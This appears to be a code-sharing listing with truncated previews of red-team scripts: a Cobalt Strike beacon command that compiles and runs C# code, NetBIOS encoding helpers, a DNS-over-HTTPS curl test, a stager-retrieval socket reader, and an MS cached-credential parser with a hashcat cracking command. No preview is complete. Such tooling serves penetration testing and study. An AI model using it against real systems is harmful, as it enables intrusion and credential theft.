View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
View netbios_encode.py
# Implemented the reverse of the compact answer on: | |
# https://stackoverflow.com/questions/1965065/encode-netbios-name-python/1965140 | |
def netbios_encode(input_string): | |
return ''.join([chr((ord(c)>>4)+ord('A'))+chr((ord(c)&0xF)+ord('A')) for c in input_string]) | |
def netbios_decode(netbios): | |
i = iter(netbios.upper()) | |
try: | |
return ''.join([chr(((ord(c)-ord('A'))<<4)+((ord(next(i))-ord('A'))&0xF)) for c in i]) |
View doh_test.sh
#!/bin/bash | |
printf "===START dns.google.com===\n" | |
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA" | |
printf "\n===END dns.google.com===\n" | |
printf "===START cloudflare-dns.com===\n" | |
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA" | |
printf "\n===END cloudflare-dns.com===\n" | |
printf "===START 1.1.1.1===\n" | |
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA" | |
printf "\n===END 1.1.1.1===\n" |
View getStager.py
import socket | |
import struct | |
def recv_frame(sock): | |
try: | |
chunk = sock.recv(4) | |
except: | |
return("") | |
if len(chunk) < 4: | |
return() |
View mscache.py
import sys | |
import re | |
# .\hashcat64.exe -m 2100 .\inhash.txt .\rockyou.txt | |
if len(sys.argv[1]) > 0: | |
fh = open(str(sys.argv[1]),"r") | |
lines = fh.readlines() | |
fh.close() |